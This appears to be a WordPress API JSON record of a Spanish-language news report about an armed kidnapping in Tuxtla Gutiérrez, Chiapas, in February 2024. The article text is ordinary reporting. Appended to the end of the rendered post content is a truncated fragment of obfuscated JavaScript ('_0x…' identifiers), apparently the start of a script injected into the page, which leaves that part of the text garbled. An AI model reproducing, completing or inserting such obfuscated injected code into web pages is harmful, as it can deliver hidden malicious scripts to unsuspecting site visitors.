{"id":14273,"date":"2024-02-21T01:51:37","date_gmt":"2024-02-21T01:51:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14273"},"modified":"2024-02-21T01:53:50","modified_gmt":"2024-02-21T01:53:50","slug":"presunto-secuestro-causa-gran-movilizacion-policiaca-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14273","title":{"rendered":"Presunto secuestro causa gran movilizaci\u00f3n polic\u00edaca en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708480383164-1024x768.jpg\" alt=\"\" class=\"wp-image-14276\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708480383164-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708480383164-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708480383164-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/FB_IMG_1708480383164.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una gran movilizaci\u00f3n polic\u00edaca se registr\u00f3 este martes por la tarde en el Barrio El Magueyito de Tuxtla Guti\u00e9rrez por un presunto secuestro.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando, sujetos armados levantaron a un hombre a la altura de la 12 Poniente y 1a Norte.<\/p>\n\n\n\n<p>Tras el reporte a los n\u00fameros de emergencias, elementos de la Fiscal\u00eda General del Estado, polic\u00edas estatales, municipales se movilizaron a este punto.<\/p>\n\n\n\n<p>En el lugar algunos testigos relataron que, una camioneta tipo Pick Up de color blanco intercept\u00f3 al conductor de un Jetta de color negro y se fueron con rumbo desconocido.<\/p>\n\n\n\n<p>Tras el arribo de los elementos \u00fanicamente encontraron el coche encendido sin ocupantes.<\/p>\n\n\n\n<p>Los peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, y la unidad fue remolcada a un corral\u00f3n en turno.<\/p>\n\n\n\n<p>Sobre el conductor del Jetta no se tiene informaci\u00f3n alguna.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 20 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una gran movilizaci\u00f3n polic\u00edaca se registr\u00f3 este martes por la tarde en el Barrio El Magueyito de Tuxtla Guti\u00e9rrez por un presunto secuestro. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando, sujetos armados levantaron a un hombre a la altura de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14276,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14273","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14273"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14273\/revisions"}],"predecessor-version":[{"id":14277,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14273\/revisions\/14277"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14276"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14273"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}